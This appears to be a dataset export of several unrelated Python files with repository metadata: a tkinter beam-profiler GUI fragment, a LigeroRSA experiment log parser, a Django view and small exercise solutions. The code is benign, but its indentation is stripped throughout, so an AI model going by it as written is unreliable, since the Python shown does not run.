cam_select = tk.Menu(toolsmenu, tearoff=0)
fittingfunction = tk.Menu(toolsmenu, tearoff=0)
mainmenu.add_cascade(label="Tools", menu=toolsmenu)
toolsmenu.add_command(label="Settings", command=GUI_menu.settings)
toolsmenu.add_cascade(label="Camera select", menu=cam_select)
cam_list = GUI.cam_select()
for i in cam_list:
cam_select.add_command(label="%d" % i, command=GUI_menu.switch_cam(i))
toolsmenu.add_cascade(label="Fitting function", menu=fittingfunction)
fittingfunction.add_command(label="gaussian", command=GUI_menu.set_gaussian)
fittingfunction.add_command(label="lorentz", command=GUI_menu.set_lorentz)
#settingsmenu.add_command(label="Exposure time", command=GUI.exposure_time)
autocorrelatormenu = tk.Menu(mainmenu, tearoff=0)
mainmenu.add_cascade(label="Autocorrelator", menu=autocorrelatormenu)
def settings():
global settingsframe
settingswindow = tk.Toplevel()
settingswindow.title("Settings")
settingswindow.geometry("500x300")
settingswindow.resizable(0,0)
#settingswindow.overrideredirect(True)
settingswindow.grid()
settingsframe = ttk.Notebook(settingswindow, width=500, height=275)
settingsframe.grid(row=1, column=1, columnspan = 3)
t1,t2,t3,t4,t5 = GUI_menu.createtab()
GUI_menu.tab_camera(t1)
GUI_menu.tab_graph(t2)
GUI_menu.tab_capture(t3)
GUI_menu.tab_savefile(t5)
def createtab():
t1 = tk.Canvas(settingsframe)
t2 = tk.Canvas(settingsframe)
t3 = tk.Canvas(settingsframe)
t4 = tk.Canvas(settingsframe)
t5 = tk.Canvas(settingsframe)
settingsframe.add(t1, text="Camera")
settingsframe.add(t2, text="Graph")
settingsframe.add(t3, text="Capture")
settingsframe.add(t4, text="Autocorrelator")
settingsframe.add(t5, text="File")
return t1, t2, t3, t4, t5
def tab_camera(t1):
global exposuretime, exposuretimebox, cam_res_box
t1frame1 = ttk.Frame(t1, width=500, height=100)
t1frame1.grid(row=1, column=1, sticky="nw", padx=30, pady=30)
t1frame2 = ttk.Frame(t1, width=500, height=100)
t1frame2.grid(row=2, column=1, sticky="nw", padx=30, pady=30)
cam_res_label = ttk.LabelFrame(t1frame1, text="Camera resolution", width=450, height=100)
cam_res_label.grid(row=1, column=1, sticky="w")
#cam_res_list = ["3264x2448", "2592x1944", "2048x1536", "1600x1200", "1280x960", "1024x768", "800x600", "640x480", "320x240"]
cam_res_list = ["1600x1200", "1280x960", "1024x768", "800x600", "640x480", "320x240"]
cam_res_list.reverse()
cam_res_box = ttk.Combobox(cam_res_label, values=cam_res_list, state="readonly")
cam_res_box.grid(row=2, column=1, padx=30, pady=10, sticky="w")
cam_res_box.set("%s" % cam_res)
cam_res_button = ttk.Button(cam_res_label, text="Set", command=GUI_menu.set_cam_res, style="style.TButton")
cam_res_button.grid(row=2, column=2, padx=10, pady=10, sticky="w")
exposuretimelabel = ttk.LabelFrame(t1frame2, text="Exposuretime", width=450, height=100)
exposuretimelabel.grid(row=1, column=1, sticky="w")
darkbutton = ttk.Button(exposuretimelabel, text="Offset", command=GUI.dark, style="style.TButton")
darkbutton.grid(row=2, column=3, padx=10)
if "C1284R13C" in cam_name or "C1285R12M" in cam_name:
exposuretimebox = ttk.Spinbox(exposuretimelabel, from_=0.1, to=100, increment=0.1)
exposuretimebox.set("%s" % exposuretime)
elif "test" in cam_name:
#exposuretimelist = ["640 ms", "320 ms", "160 ms", "80 ms", "40 ms", "20 ms", "10 ms", "5 ms", "2.5 ms", "1.25 us", "650 um", "312 um", "150 um"]
#exposuretimebox = ttk.Spinbox(t1frame2, value=exposuretimelist, state="readonly")
exposuretimebox = ttk.Spinbox(exposuretimelabel, from_=-13, to=-1, increment=1)
exposuretimebox.set("%s" % exposuretime)
exposuretimebox.grid(row=2, column=1, pady=10, sticky="w")
exposuretimebutton = ttk.Button(exposuretimelabel, text="Set", command=GUI.exposure_time, style="style.TButton")
exposuretimebutton.grid(row=2, column=2, padx=10, pady=10, sticky="w")
def tab_graph(t2):
t2frame1 = ttk.Frame(t2, width=500, height=100)
t2frame1.grid(row=1, column=1, sticky="nw", padx=30, pady=30)
axislabel = ttk.LabelFrame(t2frame1, text="Axis setting", width=450, height=100)
axislabel.grid(row=1, column=1, sticky="w")
pixelbutton = ttk.Radiobutton(axislabel, text="Pixel", variable=var, value=0, command=GUI_menu.set_actualsize())
pixelbutton.grid(row=2, column=1, sticky="w")
actualsizebuttonmm = ttk.Radiobutton(axislabel, text="Actual size (mm)", variable=var, value=1, command=GUI_menu.set_actualsize())
actualsizebuttonmm.grid(row=3, column=1, sticky="w")
actualsizebuttonum = ttk.Radiobutton(axislabel, text="Actual size (um)", variable=var, value=2, command=GUI_menu.set_actualsize())
actualsizebuttonum.grid(row=4, column=1, sticky="w")
def tab_capture(t3):
global varv, varh
t3frame1 = ttk.Frame(t3, width=500, height=100)
t3frame1.grid(row=1, column=1, sticky="nw", padx=30, pady=30)
trackingbutton = ttk.Button(t3frame1, text="Tracking", command=GUI.tracking_button, style="style.TButton")
trackingbutton.grid(row=1, column=2, rowspan=2, padx=20)
style = ttk.Style()
style.configure("style.TCheckbutton", font=("",10,"bold"))
varv = tk.BooleanVar()
verticalsliderbutton = ttk.Checkbutton(t3frame1, text="Horizontal slider", variable=varv, command=GUI.vsliderbutton, style="style.TCheckbutton")
verticalsliderbutton.grid(row=2, column=1, sticky="w")
varh = tk.BooleanVar()
horizontalsliderbutton = ttk.Checkbutton(t3frame1, text="Vertical slider", variable=varh, command=GUI.hsliderbutton, style="style.TCheckbutton")
horizontalsliderbutton.grid(row=1, column=1, sticky="w")
def tab_savefile(t5):
global varraw, varnormal, varimg, vargray, varbar, varintensity
global var_list_get
t5frame1 = ttk.Frame(t5, width=500, height=100)
t5frame1.grid(row=1, column=1, sticky="nw", padx=30, pady=30)
savefilelabel = ttk.LabelFrame(t5frame1, text="Save file", width=450, height=100)
savefilelabel.grid(row=1, column=1, sticky="w")
try:
var_list_get
except:
varraw = tk.BooleanVar()
varnormal = tk.BooleanVar()
varimg = tk.BooleanVar()
vargray = tk.BooleanVar()
varbar = tk.BooleanVar()
varintensity = tk.BooleanVar()
var_list_get = [True,False,True,False,True,False]
var_list = [varraw, varnormal, varimg, vargray, varbar, varintensity]
for i,j in zip(var_list_get, var_list):
j.set(i)
GUI_menu.get_var()
rawbutton = ttk.Checkbutton(savefilelabel, text="RAW data", command=GUI_menu.get_var, variable=varraw, style="style.TCheckbutton")
rawbutton.grid(row=2, column=1, sticky="w")
normalbutton = ttk.Checkbutton(savefilelabel, text="Normalized data", command=GUI_menu.get_var, variable=varnormal, style="style.TCheckbutton")
normalbutton.grid(row=3, column=1, sticky="w")
imgbutton = ttk.Checkbutton(savefilelabel, text="Color image", command=GUI_menu.get_var, variable=varimg, style="style.TCheckbutton")
imgbutton.grid(row=4, column=1, sticky="w")
graybutton = ttk.Checkbutton(savefilelabel, text="Black-and-white image", command=GUI_menu.get_var, variable=vargray, style="style.TCheckbutton")
graybutton.grid(row=5, column=1, sticky="w")
barbutton = ttk.Checkbutton(savefilelabel, text="with color bar", command=GUI_menu.get_var, variable=varbar, style="style.TCheckbutton")
barbutton.grid(row=2, column=2, sticky="w")
intensitybutton = ttk.Checkbutton(savefilelabel, text="with intensity plot", command=GUI_menu.get_var, variable=varintensity, style="style.TCheckbutton")
intensitybutton.grid(row=3, column=2, sticky="w")
def savefile():
global fname
fname = tkfd.asksaveasfile(confirmoverwrite=False, defaultextension=".png", filetypes=[("PNG files",".png"),("JPG files",".jpg"),("BMP files",".bmp"),("TIFF files",".tiff")])
fnamebox.insert(tk.END,fname.name)
GUI_menu.get_var()
filename = fname.name.split(".")
saveimg_norm = CV2.beam_normalize(img)
X, Y = CV2.beam_row_columns(img, saveimg_norm)
saveimg = saveimg_norm * 255
saveimg_gray = np.array(saveimg, dtype="uint8")
saveimg_color,_ = CV2.beam_color(saveimg_gray)
saveimg_intensity = CV2.beam_intensity_img(saveimg_gray, X, 0)
saveimg_intensity = CV2.beam_intensity_img(saveimg_intensity, Y, 1)
saveimg_intensity,_ = CV2.beam_color(saveimg_intensity)
if varimg.get() == True and varbar.get() == True and varintensity.get() == True:
beamimg1 = cv2.hconcat([saveimg_intensity,barimg_save])
cv2.imwrite(fname.name, beamimg1)
if varimg.get() == True and varbar.get() == True and varintensity.get() == False:
beamimg2 = cv2.hconcat([saveimg_color,barimg_save])
cv2.imwrite(fname.name, beamimg2)
if varimg.get() == True and varbar.get() == False and varintensity.get() == True:
cv2.imwrite(fname.name, saveimg_intensity)
if varimg.get() == True and varbar.get() == False and varintensity.get() == False:
cv2.imwrite(fname.name, saveimg_color)
if vargray.get() == True:
cv2.imwrite("%s_gray.%s" % (filename[0],filename[1]), saveimg_gray)
if varraw.get() == True:
np.savetxt("%s_RAW.csv" % filename[0], img, delimiter=",")
if varnormal.get() == True:
np.savetxt("%s_normalized.csv" % filename[0], img_norm, delimiter=",")
def acsavefile():
global fname
fname = tkfd.asksaveasfile(confirmoverwrite=False, defaultextension=".png", filetypes=[("PNG files",".png"),("JPG files",".jpg"),("BMP files",".bmp"),("TIFF files",".tiff")])
fnamebox.insert(tk.END,fname.name)
txtname = fname.name.split(".")
cv2.imwrite(fname.name, acdata2)
#np.savetxt("%s.csv" % txtname[0], img, delimiter=",")
try:
cv2.imwrite("%s_second%s.png" % txtname[0], acdata4)
except:
pass
txtname = fname.name.split(".")
np.savetxt("%s.csv" % txtname[0], acdata1, delimiter=",")
def set_cam_res():
global cam_res_w, cam_res_h, cam_res
#cam.release()
cam_res = cam_res_box.get()
cam_res = cam_res.split("x")
cam_res_w = int(cam_res[0])
cam_res_h = int(cam_res[1])
cam.set(cv2.CAP_PROP_FRAME_WIDTH, cam_res_w)
cam.set(cv2.CAP_PROP_FRAME_HEIGHT, cam_res_h)
#ret, frame = cam.read()
time.sleep(1)
def set_actualsize():
state = var.get()
return state
def switch_state():
state = var.get()
state += 1
if state == 3:
state = 0
def set_gaussian():
global func
func = "gaussian"
print(func)
def set_lorentz():
global func
func = "lorentz"
print(func)
def menu_quit():
cam.release()
root.destroy()
#exit()
def switch_cam(camera_id):
def x():
GUI.cam_setup_test(camera_id)
return x
def get_var():
global var_list_get
var_list = [varraw, varnormal, varimg, vargray, varbar, varintensity]
for i,j in zip(np.arange(0, len(var_list_get), 1), var_list):
var_list_get[i] = j.get()
class GUI_button:
def button():
buttonframe = ttk.Frame(subframe, height=200, width=300)
buttonframe.grid(row=1, column=1, sticky="nw")
trackingphoto = tk.PhotoImage(file="tracking.png")
trackingphoto = trackingphoto.subsample(5)
trackingbutton = ttk.Button(buttonframe, image=trackingphoto, command=GUI.tracking_button, style="style.TButton")
trackingbutton.image = trackingphoto
trackingbutton.grid(row=1, column=1)
darkphoto = tk.PhotoImage(file="offset.png")
darkphoto = darkphoto.subsample(5)
darkbutton = ttk.Button(buttonframe, image=darkphoto, command=GUI.dark, style="style.TButton")
darkbutton.image = darkphoto
darkbutton.grid(row=1, column=2)
axisphoto = tk.PhotoImage(file="axis_px.png")
axisphoto = axisphoto.subsample(5)
axisbutton = ttk.Button(buttonframe, image=axisphoto, command=GUI_menu.switch_state(), style="style.TButton")
axisbutton.image = axisphoto
axisbutton.grid(row=1, column=3)
if __name__ == "__main__":
#sys.modules[__name__].__dict__.clear()
GUI.cam_setup_test(0)
GUI.setup()
GUI_button.button()
#Settings_tab.createtab()
shutterspeed = 0
pix1, pix2 = 0, 0
knifeedge_count = 0
var = tk.IntVar()
var.set(0)
#GUI.cam_setup_test()
GUI_menu.mainmenu()
GUI.autocorrelator_graph()
dark, trackingon = 0, 0
#root.after(0, GUI.colorbar)
_, barimg = GUI.colorbar()
root.after(0, GUI.beamprofiler_img)
root.after(0, GUI.plotter)
root.after(0, GUI.beam_width)
#TAB.createtab(master=testcanvas)
#TAB.Autocorrelator_tab()
#TAB.buttons()
root.mainloop() | [
"[email protected]"
] | |
da6a6a82023d8bd6df509fa28f82aa169fdb69c2 | c1b31aa113c626f3cbb5264fac9e4c9cad83b8b9 | /process_logs/parse.py | 033a954b70d04c783f9a7d9f2a881513fff78cdf | [
"Apache-2.0"
] | permissive | JustinDrake/LigeroRSA | cff724a5da387bd7ac9093007cb1b7897e496fca | 5d6d05788d7d4b44f0ddb01b8221f79b4851653a | refs/heads/master | 2022-09-10T08:18:03.902128 | 2020-06-01T23:32:37 | 2020-06-01T23:32:37 | 268,911,316 | 1 | 2 | NOASSERTION | 2020-06-02T21:21:15 | 2020-06-02T21:21:14 | null | UTF-8 | Python | false | false | 13,642 | py | #!/usr/local/bin/python3.7
from os import path
from datetime import datetime
import re
import glob
from statistics import mean, stdev
### REGULAR EXPRESSIONS FOR PARSING PARTS OF LOGS
logts = re.compile('([0-9]{2}):([0-9]{2}):([0-9]{2}).([0-9]{3})')
# 21:12:23.981 โน ,1.a. Overall speed, , ,374.32 MB,374.32 MB,06:21.692612,06:21.692616,
s1a = re.compile('1\.a\. Overall speed, , ,([0-9\.]+) MB,([0-9\.]+) MB,(\d\d):(\d\d)\.(\d+)') #, , ,([0-9\.]+) MB,([0-9\.]+) MD,(\d\d):(\d\d)\.(\d+)')
# 21:06:02.288 Registration completed for 2 out of 2
reg = re.compile('Registration completed')
preg = re.compile('registering with coordinator')
# 21:06:24.001 โนRSA Ceremony, , , ,304.11 MB,304.11 MB,00:21.713310,00:21.713311,
# 21:25:11.714 Found 1 valid moduli:
# 07:41:24.961 No candidates found.
passive = re.compile('(Found . valid moduli)|(No candidates found)')
# 21:12:23.981 Verified all proofs; ceremony successful.
allver = re.compile('Verified all proofs')
# 21:06:03.498 MessageType: PUBLIC_KEY_A_VALUE message size: 11010105 bytes
msgtype = re.compile('MessageType: ([A-Z\_]+) message size: ([0-9]+) bytes')
memory = re.compile('Peak Memory = ([0-9]+) Kb')
# 21:26:08.706 Verifying modulus idx:0
vstart = re.compile('Verifying modulus idx:([0-9]+)')
vend = re.compile('Verification for modulus idx:[0-9]+ succeeded')
sendproof = re.compile('Send Proof for Modulus ([0-9]+)')
# MSGS should occur in this order. Todo: check for this in each log
msg_list = [
'PROTOCOL_CONFIG',
'PUBLIC_KEY_A_VALUE',
'PUBLIC_KEY_B_VALUE',
'ASSIGNMENT_PN',
'ENCRYPTED_X_VALUE',
'ENCRYPTED_XY_PLUS_Z_VALUE',
'PS_SIEVING_FLAGS',
'AX_BY_VALUE',
'MODULUS_CANDIDATE',
'POST_SIEVE',
'GAMMA_SHARES',
'GAMMA_RANDOM_SEED_VALUE',
'DISCARD_FLAGS',
'GCD_RAND_SHARES',
'AX_BY_VALUE',
'DISCARD_FLAGS',
'FOUND_MODULI',
]
active_list = [
'GATHER_PUBLIC_DATA',
'GATHER_PROOF_0',
'GATHER_PROOF_1',
'GATHER_PROOF_2',
'GATHER_PROOF_3',
'GATHER_PROOF_4',
'GATHER_PROOF_5',
'GATHER_PROOF_6',
'GATHER_PROOF_7',
'GATHER_PROOF_8',
'GATHER_PROOF_9',
'GATHER_PROOF_10',
'GATHER_PROOF_11',
'GATHER_PROOF_12',
'GATHER_PROOF_13',
'GATHER_PROOF_14',
'GATHER_PROOF_15',
'GATHER_PROOF_16',
'GATHER_PROOF_17',
'GATHER_PROOF_18',
'GATHER_PROOF_19',
'GATHER_PROOF_20',
]
party_msg_list = [
#'ID_PARTY',
'PUBLIC_KEY_A_SHARES',
'PUBLIC_KEY_B_SHARES',
'ENCRYPTED_X_SHARES',
'ENCRYPTED_XY_PLUS_Z_SHARES',
'PARTIAL_XY_MINUS_Z_SHARES',
'AX_BY_SHARES',
'AXB_MINUS_BYA_SHARES',
'MUTHU_ACK',
'GAMMA_RANDOM_SEED_SHARES',
'EXPONENTIATED_GAMMA_VALUE',
'GCD_AX_BY_SHARES',
'AXB_MINUS_BYA_SHARES'
]
class Experiment:
def __init__(self, name):
self.name = name
self.registration = []
self.party_registration = []
self.passive = []
self.active = []
self.overall = []
self.msg_ts = {}
self.msg_sz = {}
self.party_msg_ts = {}
self.party_msg_sz = {}
self.memory = []
self.vidle = {} # verifier idle times
self.vwork = {} # verifier work times
def summary(self):
print(self.name + ' ' + str(len(self.registration)) + ' runs')
print(f' registration: {mean(self.registration):.2f}')
print(f'p registration: {mean(self.party_registration):.2f}')
print(f' passive: {self.avg_passive():.2f}')
print(f' active: {self.avg_active():.2f}')
for m in msg_list:
print(f' {m.rjust(26)} C: {self.avg_msg(m):.2f}')
for m in party_msg_list:
print(f' {m.rjust(26)} P: {self.avg_party_msg(m):.2f}')
# for m in active_list:
# print(f' {m.rjust(26)} C: {mean(self.msg_ts[m]):.2f}')
# for m in active_list[1:]:
# print(f' {m.rjust(26)} P: {mean(self.party_msg_ts[m]):.2f}')
def avg_passive(self):
return mean(self.passive)
def std_passive(self):
if len(self.passive)>1:
return stdev(self.passive)
else:
return 0
def avg_active(self):
if len(self.active) > 0:
return mean(self.active)
else:
return -1
def std_active(self):
if len(self.active) > 1:
return stdev(self.active)
else:
return -1
def avg_reg(self):
return mean(self.registration)
def avg_mem(self):
if len(self.memory) > 0:
return mean(self.memory)
else:
return -1
def avg_msg(self, msg):
if msg in self.msg_ts.keys() and len(self.msg_ts[msg]) > 0:
return mean(self.msg_ts[msg])
else:
return -1
def avg_party_msg(self, msg):
if msg in self.party_msg_ts.keys() and len(self.party_msg_ts[msg]) > 0:
return mean(self.party_msg_ts[msg])
else:
return -1
def avg_msg_sz(self, msg):
if msg in self.msg_sz.keys() and len(self.msg_sz[msg]) > 0:
return mean(self.msg_sz[msg])
else:
return -1
def std_msg_sz(self, msg):
if msg in self.msg_sz.keys() and len(self.msg_sz[msg]) > 0:
return stdev(self.msg_sz[msg])
else:
return 0
def avg_party_msg_sz(self, msg):
if msg in self.party_msg_sz.keys() and len(self.party_msg_sz[msg]) > 0:
return mean(self.party_msg_sz[msg])
else:
return -1
def std_party_msg_sz(self, msg):
if msg in self.party_msg_sz.keys() and len(self.party_msg_sz[msg]) > 0:
return stdev(self.party_msg_sz[msg])
else:
return 0
def std_party_msg(self, msg):
if msg in self.party_msg_ts.keys() and len(self.party_msg_ts[msg]) > 0:
return stdev(self.party_msg_ts[msg])
else:
return -1
def avg_vidle(self, idx):
if len(self.vidle) > 0:
return mean(self.vidle[idx])
else:
return -1
def avg_vwork(self, idx):
if len(self.vwork) > 0:
return mean(self.vwork[idx])
else:
return -1
def std_vidle(self, idx):
if len(self.vidle) > 0:
return stdev(self.vidle[idx])
else:
return -1
def std_vwork(self, idx):
if len(self.vwork) > 0:
return stdev(self.vwork[idx])
else:
return -1
def ts(line):
m = logts.match(line)
ts = 0
if m:
ts = int(m.group(1))*60*60*1000 + int(m.group(2))*60*1000 + int(m.group(3))*1000 + int(m.group(4))
return ts
def coordinator_parser(rp, exp):
filepath = rp + '/coordinator.log'
cnt = 0
with open(filepath) as fp:
line = fp.readline()
start = ts(line)
prot_start = start
last_sent_msg = start
gp = 0
tt = 0
idx = 0
gp_time = 0
while line:
#print("Line {}: {}".format(cnt, line.strip()))
t = ts(line)
m = reg.search(line)
if m:
print(' ' + str(t-start) + ' registration')
exp.registration.append(t-start)
prot_start = t
last_sent_msg = prot_start
print(f' setting prot_start {prot_start}')
m = passive.search(line)
if m:
print(f' {(t-prot_start)} passive done. sum:{tt}')
exp.passive.append(t-prot_start)
gp_start = t
m = allver.search(line)
if m:
print(' ' + str(t-prot_start) + ' all done')
exp.active.append(t-prot_start)
m = msgtype.search(line)
if m:
key = m.group(1)
if key == "GATHER_PROOFS":
gp = gp + 1
key = "GATHER_PROOF_" + str(gp)
# print(' ' + str(t-last_sent_msg) + ' ' + key + ' ' + m.group(2))
exp.msg_sz.setdefault(key, []).append(int(m.group(2)))
# handle proof timing below
if m.group(1) != "GATHER_PROOFS":
exp.msg_ts.setdefault(key, []).append(t-last_sent_msg)
tt += (t-last_sent_msg)
last_sent_msg = t
# gather proofs are sent in batches of n to verifiers in order.
m = sendproof.search(line)
if m:
nidx = int(m.group(1))
if nidx > idx: # moving on to next proof
key = "GATHER_PROOF_" + str(idx)
exp.msg_ts.setdefault(key, []).append(t-gp_start)
gp_start = t
idx = nidx
m = s1a.search(line)
if m:
dur = int(m.group(3))*60*1000 + int(m.group(4))*1000 + int(m.group(5))/1000
# print(' ' + str(t-prot_start) + ' Overall: ' + m.group(1) + ' ' + m.group(2) + ' ' + str(dur))
exp.overall.append(dur)
#print(str(t) + "\n")
# m = s1a.match(line)
# if m:
# print(line)
# print(m.group(1) + ' ' + m.group(2) )
line = fp.readline()
cnt += 1
def party_parser(rp, exp):
cnt = 0
for f in glob.iglob(rp+'/party_full_protocol_*.log'):
cnt = cnt + 1
# print(' ' + f)
with open(f) as fp:
line = fp.readline()
start = ts(line)
last_sent_msg = start
gp = 0 # the GATHER_PROOF counter, since we want to separate by party
while line:
t = ts(line)
# reset start as soon as reg is done
m = preg.search(line)
if m:
exp.party_registration.append(t-start)
start = t
last_sent_msg = t
## parsing msgtype so far
m = msgtype.search(line)
if m:
key = m.group(1)
if key == "GATHER_PROOFS":
key = "GATHER_PROOF_" + str(gp)
gp = gp + 1
# print(' ' + str(t-last_sent_msg) + ' ' + key + ' ' + m.group(2))
exp.party_msg_ts.setdefault(key, []).append(t-last_sent_msg)
exp.party_msg_sz.setdefault(key, []).append(int(m.group(2)))
last_sent_msg = t
m = memory.search(line)
if m:
exp.memory.append(int(m.group(1)))
line = fp.readline()
print(f' parsed {cnt} party log files')
def verifier_parser(rp, exp):
for f in glob.iglob(rp+'/distributed_verifier*.log'):
with open(f) as fp:
line = fp.readline()
last_start = ts(line)
last_end = last_start
idx = 0 # idx we are trying to verify next
while line:
t = ts(line)
m = vstart.search(line)
if m:
last_start = ts(line)
if idx > 0:
idle = t-last_end
# print(f' idle {idle} {line}')
exp.vidle.setdefault(idx,[]).append(idle)
m = vend.search(line)
if m:
vtime = t-last_start
exp.vwork.setdefault(idx,[]).append(vtime)
idx = idx+1
last_end = t
# print(f' work {vtime} {line}')
line = fp.readline()
dirs = [ "2", "5", "10", "20", "50", "100", ]#"200", "500", "1000", "2000", "4046" ]
maindir = './data/03-04-20/'
experiments = {}
for d in dirs:
cnt = 1
exp = Experiment(d)
experiments[d] = exp
while True:
rp = maindir + d + '/run' + str(cnt)
if path.exists(rp):
print('Parsing %s' % rp)
coordinator_parser(rp, exp)
party_parser(rp, exp)
verifier_parser(rp, exp)
else:
break
cnt = cnt + 1
print(' ['+d+'] Done parsing ' + str(cnt-1) + ' runs')
exp.summary()
# make the summary tables of passive/active total time
print(f'#n passive active reg')
for d in dirs:
e = experiments[d]
print(f'{d.ljust(5)} & {e.avg_passive()/1000:.1f} {e.std_passive()/1000:.1f} & {e.avg_active()/1000:.1f} {e.std_active()/1000:.1f}& & {e.avg_reg()/1000:.1f}\\\\[2pt] % {len(e.passive)} {len(e.active)} ')
print()
# make the per-message table
print(f'n ', end=' ')
for m in msg_list:
print(f'{m}', end=' ')
print('PASS SUM')
for d in dirs:
e = experiments[d]
print(f'{d.ljust(5)}', end =" ")
sum = 0
for m in msg_list:
sum += (e.avg_msg(m)/1000)
print(f'{e.avg_msg(m)/1000:5.1f}', end =' ')
print(f'{e.avg_passive()/1000:5.1f} {sum:5.1f}')
########## make the verifier idle/work time
print()
print(f'n work0 idle1 work1 ... (for verifier.txt)')
for d in dirs:
e = experiments[d]
print(f'{d.ljust(5)} {e.avg_vwork(0)/1000:.1f}', end=' ')
for idx in range(1,21):
print(f'{e.avg_vidle(idx)/1000:.1f} {e.avg_vwork(idx)/1000:.1f}', end=' ')
print()
###### coordinator proof, for m2.txt
print()
for d in dirs:
e = experiments[d]
print(f'{d.ljust(5)}', end =" ")
sum = 0
for m in active_list[1:]:
print(f'{e.avg_party_msg(m)/1000:5.2f}', end =' ')
print()
### msg size analysis
sz_list = [
'PUBLIC_KEY_A_VALUE',
'PUBLIC_KEY_B_VALUE',
'ENCRYPTED_X_VALUE',
'ENCRYPTED_XY_PLUS_Z_VALUE',
'PS_SIEVING_FLAGS',
'AX_BY_VALUE',
'MODULUS_CANDIDATE',
'AX_BY_VALUE',
]
print()
for m in sz_list:
print(f'{m}', end=' ')
print('OTHER')
for d in dirs:
e = experiments[d]
print(f'{d.ljust(5)}', end =" ")
other = e.avg_msg_sz('PROTOCOL_CONFIG') + e.avg_msg_sz('ASSIGNMENT_PN') + e.avg_msg_sz('POST_SIEVE') +e.avg_msg_sz('GAMMA_SHARES') + e.avg_msg_sz('GAMMA_RANDOM_SEED_VALUE') +e.avg_msg_sz('DISCARD_FLAGS') + e.avg_msg_sz('GCD_RAND_SHARES') +e.avg_msg_sz('DISCARD_FLAGS') + e.avg_msg_sz('FOUND_MODULI')
for m in sz_list:
print(f'{e.avg_msg_sz(m):5.1f}', end =' ')
print(f'{other:5.1f}')
# echo "filename,idle,compute" >> $out
# for dataFile in $(ls data/distributed_*)
# do
# idle=`cat $dataFile | grep '6.a. verification' | grep idle | tail -n +2 | awk -F',' '{ print $9 }' | python3 -c "import sys; x=sys.stdin.read().split('\n')[:-1]; print(sum([float(i.split(':')[0]) * 60 + float(i.split(':')[1]) for i in x]))"`
# compute=`cat $dataFile | grep '6.a. verification' | grep compute | awk -F',' '{ print $9 }' | python3 -c "import sys; x=sys.stdin.read().split('\n')[:-1]; print(sum([float(i.split(':')[0]) * 60 + float(i.split(':')[1]) for i in x]))"`
# echo "$dataFile,$idle,$compute" >> $out
# done
| [
"[email protected]"
] | |
2bc5d18f4cc871157c8bcaf56cb4a04dc1338d76 | 0758ddc73ff870a965ad217d56dcd12d88342172 | /classroom/classroomapp/views.py | 12569fa577c5514231614de2d7a0ade727be3ec9 | [] | no_license | konetipavan/POC | 21938393e1d4923b7c866ac2ba67abdebf49b09d | cb37d25adccb5dc2f250a78103a9a4d4a9867cda | refs/heads/master | 2023-08-06T00:01:36.359724 | 2020-09-23T11:25:39 | 2020-09-23T11:25:39 | 297,954,684 | 0 | 0 | null | 2021-09-22T19:35:28 | 2020-09-23T11:56:16 | Python | UTF-8 | Python | false | false | 188 | py | from django.shortcuts import render
from django.http import HttpResponse
# Create your views here.
def class_room(request):
return HttpResponse ("Welcome to Class Room Application")
| [
"[email protected]"
] | |
fbe04a89847a36e905a6e4af83f79bc43ca90cda | 21d1e5c00e4597aae8e0e496c2e6c4382e1b66c5 | /Peuler3.py | 6beedbba97a636e4f0c02271d5bb562548122e36 | [] | no_license | nishanksp9/Hello | 2fc98435b133795a63569b66a708f822812ed596 | f1a62f074b62f41ae8f695b221cae19309e314f9 | refs/heads/master | 2021-05-10T21:12:32.634280 | 2018-01-20T16:47:23 | 2018-01-20T16:47:23 | 118,221,697 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 462 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
The prime factors of 13195 are 5, 7, 13 and 29.
What is the largest prime factor of the number 600851475143 ?
"""
#q=2
#count=0
n=int(input("Enter a number:"))
for i in range (2, n+1, 1):
count=0
if n%i==0:
#print(i)
for q in range (2, i+1, 1):
if i%q==0:
count+=1
if count==1:
print(i)
| [
"[email protected]"
] | |
a41512cc7687985b9362c8642eeb177b34b65643 | 49301355240895072ab07752986769a8fd94efed | /ch02/name_cases.py | d15faab5d1bbc0f16a6dffc393b1732f6e893658 | [] | no_license | patrickbucher/python-crash-course | 507fff579df27df3802defdca9eac4170372e5c1 | fbadfb013ce2dabd71ef642f7e90fb4b8f0df86e | refs/heads/master | 2021-05-23T08:32:05.453001 | 2020-04-05T22:11:42 | 2020-04-05T22:11:42 | 253,200,355 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 84 | py | name = 'pAtRiCk bUcHeR'
print(name.lower())
print(name.upper())
print(name.title())
| [
"[email protected]"
] | |
09a6fdd19a950370a84cd3865f9055226f763661 | 1adaa02f6329dee3245059a21aeef42568fb98ce | /hackerrank/Greedy/05-sherlockAndTheBeast.py | d7e5d1ca67a21d227897a5c2ef69742323033dbe | [
"MIT"
] | permissive | Suraj-Upadhyay/ProblemSolving | 6954c63a10d5bccab1a6d104d8c44459a2a177e1 | 309160f6a2fb43ae7673210b01957ffca9247d0d | refs/heads/master | 2023-01-22T15:38:49.155431 | 2020-11-23T14:56:25 | 2020-11-23T14:56:25 | 287,932,091 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 735 | py | #!/bin/python3
import math
import os
import random
import re
import sys
# Complete the decentNumber function below.
def decentNumber(n):
fives = threes = 0
if n % 3 == 0:
fives = n // 3
threes = 0
elif n % 3 == 2:
fives = n // 3 - 1
threes = 1
else:
fives = n // 3 - 3
threes = 2
if fives < 0 or threes < 0 or (fives == 0 and threes == 0):
print(-1)
else:
answer = ['5' for i in range(fives * 3)] + ['3' for i in range(threes * 5)]
for x in answer:
print(x, end='')
print()
if __name__ == '__main__':
t = int(input().strip())
for t_itr in range(t):
n = int(input().strip())
decentNumber(n)
| [
"[email protected]"
] |
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.